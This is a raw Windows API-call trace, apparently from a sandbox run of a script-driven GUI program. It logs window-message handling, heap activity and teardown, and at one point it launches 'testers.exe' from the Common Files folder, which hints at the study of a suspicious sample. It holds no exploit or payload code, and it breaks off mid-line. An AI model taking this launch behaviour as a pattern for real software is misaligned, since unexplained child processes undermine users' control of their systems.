[0269.397] NtdllDialogWndProc_W () returned 0x0 [0269.397] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.397] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.397] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0269.397] NtdllDialogWndProc_W () returned 0x0 [0269.420] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.420] GetWindowLongW (hWnd=0xa0170, nIndex=-20) returned 256 [0269.420] NtdllDialogWndProc_W () returned 0x1 [0269.420] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.420] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.420] GetClientRect (in: hWnd=0xa0170, lpRect=0x75f288 | out: lpRect=0x75f288) returned 1 [0269.420] GetCursorPos (in: lpPoint=0x75f298 | out: lpPoint=0x75f298*(x=883, y=506)) returned 1 [0269.420] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f298 | out: lpPoint=0x75f298) returned 1 [0269.420] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0269.420] SetCursor (hCursor=0x10003) returned 0x10003 [0269.420] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.420] NtdllDialogWndProc_W () returned 0x0 [0269.420] GetForegroundWindow () returned 0x8014c [0269.421] GetWindowLongW (hWnd=0x8014c, nIndex=-21) returned 7730976 [0269.465] GetForegroundWindow () returned 0x8014c [0269.465] GetWindowLongW (hWnd=0x8014c, nIndex=-21) returned 7730976 [0269.516] GetForegroundWindow () returned 0x8014c [0269.516] GetWindowLongW (hWnd=0x8014c, nIndex=-21) returned 7730976 [0269.557] GetForegroundWindow () returned 0x8014c [0269.557] GetWindowLongW (hWnd=0x8014c, nIndex=-21) returned 7730976 [0269.606] GetForegroundWindow () returned 0x8014c [0269.606] GetWindowLongW (hWnd=0x8014c, nIndex=-21) returned 7730976 [0269.656] GetForegroundWindow () returned 0x8014c [0269.656] GetWindowLongW (hWnd=0x8014c, nIndex=-21) returned 7730976 [0269.702] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc7618 [0269.702] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdf0 [0269.702] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75ebd8) returned 1 [0269.702] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7618 | out: hHeap=0xb80000) returned 1 [0269.702] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdf0 | out: hHeap=0xb80000) returned 1 [0269.702] KillTimer (hWnd=0x60172, uIDEvent=0x1) returned 1 [0269.702] SetTimer (hWnd=0x60172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0269.702] GetForegroundWindow () returned 0x8014c [0269.702] GetWindowLongW (hWnd=0x8014c, nIndex=-21) returned 7730976 [0269.719] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.719] NtdllDialogWndProc_W () returned 0x0 [0269.720] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.720] NtdllDialogWndProc_W () returned 0x0 [0269.720] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.720] NtdllDialogWndProc_W () returned 0x0 [0269.721] NtdllDefWindowProc_W () returned 0x0 [0269.721] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.721] NtdllDialogWndProc_W () returned 0x1 [0269.722] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.722] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.722] NtdllDialogWndProc_W () returned 0x0 [0269.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d10 | out: hHeap=0xb80000) returned 1 [0269.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0269.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b458 | out: hHeap=0xb80000) returned 1 [0269.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b218 | out: hHeap=0xb80000) returned 1 [0269.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98da0 | out: hHeap=0xb80000) returned 1 [0269.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf968 | out: hHeap=0xb80000) returned 1 [0269.724] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.724] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.724] TranslateMessage (lpMsg=0x75f90c) returned 0 [0269.724] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0269.724] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.724] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.724] TranslateMessage (lpMsg=0x75f90c) returned 0 [0269.724] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0269.724] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.724] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.725] GetWindowLongW (hWnd=0xa0170, nIndex=-20) returned 256 [0269.725] NtdllDialogWndProc_W () returned 0x1 [0269.725] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.725] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.725] GetClientRect (in: hWnd=0xa0170, lpRect=0x75f658 | out: lpRect=0x75f658) returned 1 [0269.725] GetCursorPos (in: lpPoint=0x75f668 | out: lpPoint=0x75f668*(x=795, y=507)) returned 1 [0269.725] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f668 | out: lpPoint=0x75f668) returned 1 [0269.725] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0269.725] SetCursor (hCursor=0x10003) returned 0x10003 [0269.725] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.725] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0269.725] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.725] NtdllDialogWndProc_W () returned 0x0 [0269.725] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.725] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.725] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] NtdllDialogWndProc_W () returned 0x1 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.726] SetBkColor (hdc=0x2a0101eb, color=0xf0f0f0) returned 0xf0f0f0 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] NtdllDialogWndProc_W () returned 0x0 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.726] SetBkColor (hdc=0x2a0101eb, color=0xf0f0f0) returned 0xf0f0f0 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.726] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0269.727] NtdllDialogWndProc_W () returned 0x0 [0269.727] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.727] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.727] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0269.727] NtdllDialogWndProc_W () returned 0x0 [0269.738] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0269.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdf0 [0269.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf968 [0269.738] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0269.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf968 | out: hHeap=0xb80000) returned 1 [0269.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdf0 | out: hHeap=0xb80000) returned 1 [0269.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98da0 [0269.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda4110 [0269.739] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffdf0 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc7618 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdc0 [0269.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7618 | out: hHeap=0xb80000) returned 1 [0269.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdc0 | out: hHeap=0xb80000) returned 1 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffdc0 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde3118 [0269.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde3118 | out: hHeap=0xb80000) returned 1 [0269.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdc0 | out: hHeap=0xb80000) returned 1 [0269.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdf0 | out: hHeap=0xb80000) returned 1 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17aa0 [0269.739] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf968 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b218 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffdf0 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b458 [0269.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdf0 | out: hHeap=0xb80000) returned 1 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x42) returned 0xdb4470 [0269.739] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0269.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2a) returned 0xdfdeb8 [0269.740] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xdfdeb8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0269.740] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x75f558*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x75f520 | out: lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x75f520*(hProcess=0x618, hThread=0x5e4, dwProcessId=0x67c, dwThreadId=0x668)) returned 1 [0269.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdb4470 | out: hHeap=0xb80000) returned 1 [0269.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfdeb8 | out: hHeap=0xb80000) returned 1 [0269.746] CloseHandle (hObject=0x5e4) returned 1 [0269.746] CloseHandle (hObject=0x618) returned 1 [0269.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b458 | out: hHeap=0xb80000) returned 1 [0269.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b218 | out: hHeap=0xb80000) returned 1 [0269.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf968 | out: hHeap=0xb80000) returned 1 [0269.746] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 1 [0269.746] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f6b4) returned 0 [0269.746] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f6b4) returned 1 [0269.747] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 1 [0269.747] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f6b4) returned 0 [0269.747] TranslateMessage (lpMsg=0x75f6b4) returned 0 [0269.747] DispatchMessageW (lpMsg=0x75f6b4) returned 0x0 [0269.747] GetForegroundWindow () returned 0xa0170 [0269.747] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.747] GetCursorPos (in: lpPoint=0x75f4f0 | out: lpPoint=0x75f4f0*(x=795, y=507)) returned 1 [0269.747] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f4f0 | out: lpPoint=0x75f4f0) returned 1 [0269.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x24) returned 0xdabbe0 [0269.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b218 [0269.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdf0 [0269.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffdc0 [0269.747] GetAsyncKeyState (vKey=1) returned 1 [0269.747] GetAsyncKeyState (vKey=2) returned 0 [0269.748] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17aa0 | out: hHeap=0xb80000) returned 1 [0269.748] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda4110 | out: hHeap=0xb80000) returned 1 [0269.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98da0 | out: hHeap=0xb80000) returned 1 [0269.748] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf968 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdd0 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfb48 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98da0 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffde0 [0269.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98da0 | out: hHeap=0xb80000) returned 1 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf7d8 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98da0 [0269.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf968 | out: hHeap=0xb80000) returned 1 [0269.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdd0 | out: hHeap=0xb80000) returned 1 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf968 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffdd0 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfdc8 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b458 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe00 [0269.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b458 | out: hHeap=0xb80000) returned 1 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfcd8 [0269.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b458 [0269.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf968 | out: hHeap=0xb80000) returned 1 [0269.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdd0 | out: hHeap=0xb80000) returned 1 [0269.749] LockWindowUpdate (hWndLock=0x0) returned 0 [0269.749] DestroyWindow (hWnd=0x60172) returned 1 [0269.749] NtdllDefWindowProc_W () returned 0x0 [0269.749] KillTimer (hWnd=0x60172, uIDEvent=0x1) returned 1 [0269.749] Shell_NotifyIconW (dwMessage=0x2, lpData=0x75f328) returned 1 [0269.779] DestroyWindow (hWnd=0xa0170) returned 1 [0269.779] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.779] NtdllDialogWndProc_W () returned 0x0 [0269.779] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.779] NtdllDialogWndProc_W () returned 0x0 [0269.788] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.788] NtdllDialogWndProc_W () returned 0x0 [0269.792] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.792] NtdllDialogWndProc_W () returned 0x1 [0269.793] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.794] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.794] NtdllDialogWndProc_W () returned 0x0 [0269.794] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.794] NtdllDialogWndProc_W () returned 0x0 [0269.794] NtdllDefWindowProc_W () returned 0x0 [0269.795] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.795] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.795] InvalidateRect (hWnd=0xa0170, lpRect=0x0, bErase=1) returned 1 [0269.795] DestroyAcceleratorTable (hAccel=0x19010b) returned 1 [0269.795] DeleteObject (ho=0x440a06f6) returned 1 [0269.795] DestroyWindow (hWnd=0x90150) returned 1 [0269.795] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.795] NtdllDialogWndProc_W () returned 0x0 [0269.795] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd967d8 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2a0 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd967c0 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff290 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96598 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff170 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdbc108 | out: hHeap=0xb80000) returned 1 [0269.796] DestroyWindow (hWnd=0x60168) returned 1 [0269.796] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.796] NtdllDialogWndProc_W () returned 0x0 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96838 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff300 | out: hHeap=0xb80000) returned 1 [0269.796] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96820 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2f0 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96808 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2e0 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xccb148 | out: hHeap=0xb80000) returned 1 [0269.797] DeleteObject (ho=0xb40a01d2) returned 1 [0269.797] DestroyWindow (hWnd=0x6016a) returned 1 [0269.797] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.797] NtdllDialogWndProc_W () returned 0x0 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96880 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff90 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a30 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfffa0 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969e8 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4b0 | out: hHeap=0xb80000) returned 1 [0269.797] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe00050 | out: hHeap=0xb80000) returned 1 [0269.798] DeleteObject (ho=0xee0a01a4) returned 1 [0269.798] DestroyWindow (hWnd=0x6015e) returned 1 [0269.798] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.798] NtdllDialogWndProc_W () returned 0x0 [0269.798] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b3b0 | out: hHeap=0xb80000) returned 1 [0269.798] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff340 | out: hHeap=0xb80000) returned 1 [0269.798] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98e90 | out: hHeap=0xb80000) returned 1 [0269.798] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff320 | out: hHeap=0xb80000) returned 1 [0269.798] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b248 | out: hHeap=0xb80000) returned 1 [0269.798] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffff0 | out: hHeap=0xb80000) returned 1 [0269.798] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe000f8 | out: hHeap=0xb80000) returned 1 [0269.798] DeleteObject (ho=0x180a0731) returned 1 [0269.798] DestroyWindow (hWnd=0x6010a) returned 1 [0269.798] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.798] NtdllDialogWndProc_W () returned 0x0 [0269.799] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b380 | out: hHeap=0xb80000) returned 1 [0269.799] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe00000 | out: hHeap=0xb80000) returned 1 [0269.799] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b368 | out: hHeap=0xb80000) returned 1 [0269.799] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfffb0 | out: hHeap=0xb80000) returned 1 [0269.799] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98bf0 | out: hHeap=0xb80000) returned 1 [0269.799] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff70 | out: hHeap=0xb80000) returned 1 [0269.799] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe001a0 | out: hHeap=0xb80000) returned 1 [0269.799] DeleteObject (ho=0xbf0a007f) returned 1 [0269.799] DestroyWindow (hWnd=0x700a2) returned 1 [0269.799] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.799] NtdllDialogWndProc_W () returned 0x0 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b3e0 | out: hHeap=0xb80000) returned 1 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe00020 | out: hHeap=0xb80000) returned 1 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96928 | out: hHeap=0xb80000) returned 1 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe90 | out: hHeap=0xb80000) returned 1 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969a0 | out: hHeap=0xb80000) returned 1 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff50 | out: hHeap=0xb80000) returned 1 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe00248 | out: hHeap=0xb80000) returned 1 [0269.800] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe50 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff390 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3d0 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff60 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff310 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff2b0 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd967a8 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff270 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96790 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff260 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96778 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff250 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96760 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff240 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: 